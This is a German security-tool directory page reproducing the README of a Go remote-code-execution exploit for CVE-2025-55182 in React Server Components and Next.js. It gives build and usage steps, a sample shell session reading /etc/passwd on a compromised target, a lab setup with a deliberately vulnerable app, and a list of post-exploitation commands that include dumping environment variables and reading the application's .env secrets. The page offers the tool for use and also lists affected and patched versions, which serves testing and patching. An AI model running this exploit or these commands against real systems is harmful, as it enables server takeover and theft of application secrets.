Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — RCE-Exploit-Tool für CVE-2025-55182, eine kritische Sicherheitslücke in React Server Components (RSC), die React 19.0.0 - 19.2.0 und Next.js-Anwendungen betrifft. | Kitploit
Tools/GitHubGitHub/yyax13/cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubyyax13/cve-2025-55182

CVE-2025-55182

RCE-Exploit-Tool für CVE-2025-55182, eine kritische Sicherheitslücke in React Server Components (RSC), die React 19.0.0 - 19.2.0 und Next.js-Anwendungen betrifft.

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

👻 CVE-2025-55182 Go exploit

Interaktives RCE-Exploitationstool für CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 Was ist das?

CVE-2025-55182 ist ein minimales, interaktives RCE-Exploitationstool, das auf CVE-2025-55182 abzielt, eine kritische Schwachstelle in React Server Components (RSC), die React 19.0.0 - 19.2.0 und Next.js-Anwendungen betrifft.


📦 Installation

Voraussetzungen

  • Go 1.18 oder höher
  • Ein anfälliges Ziel, das React 19.0.0 - 19.2.0 verwendet

Aus Quellcode erstellen

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Nutzung

Grundlegende Nutzung

root@kitploit:~
./CVE-2025-55182

Interaktive Sitzung

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Demo

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Betroffene Versionen:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js-Anwendungen, die diese React-Versionen verwenden

Gepatchte Versionen:

  • React 19.2.1+
  • Next.js mit aktualisierter React-Abhängigkeit

🧪 Testlabor einrichten

Möchten Sie dies sicher testen? Richten Sie eine anfällige Laborumgebung ein:

root@kitploit:~
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./CVE-2025-55182
# Enter: localhost:3000

📚 Häufige Befehle

root@kitploit:~
ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets

📊 Repository-Statistiken

GitHub repo size GitHub last commit GitHub issues


🔗 Referenzen

  • CVE-2025-55182 Details
  • React Security Advisory
  • Next.js Security Advisory
  • Original PoC von maple3142
  • Assetnote-Forschung
  • Anfällige Test-App

💬 Community & Support

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

Einen Fehler gefunden? Eröffnen Sie ein Issue


⭐ Zeigen Sie Ihre Unterstützung

Wenn dieses Tool Ihnen geholfen hat:

  • ⭐ Star dieses Repository
  • 💬 Teilen Sie es mit anderen

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.


Erstellt mit 👻 von Hghost0x00
Happy Hacking ⚡

Tool herunterladen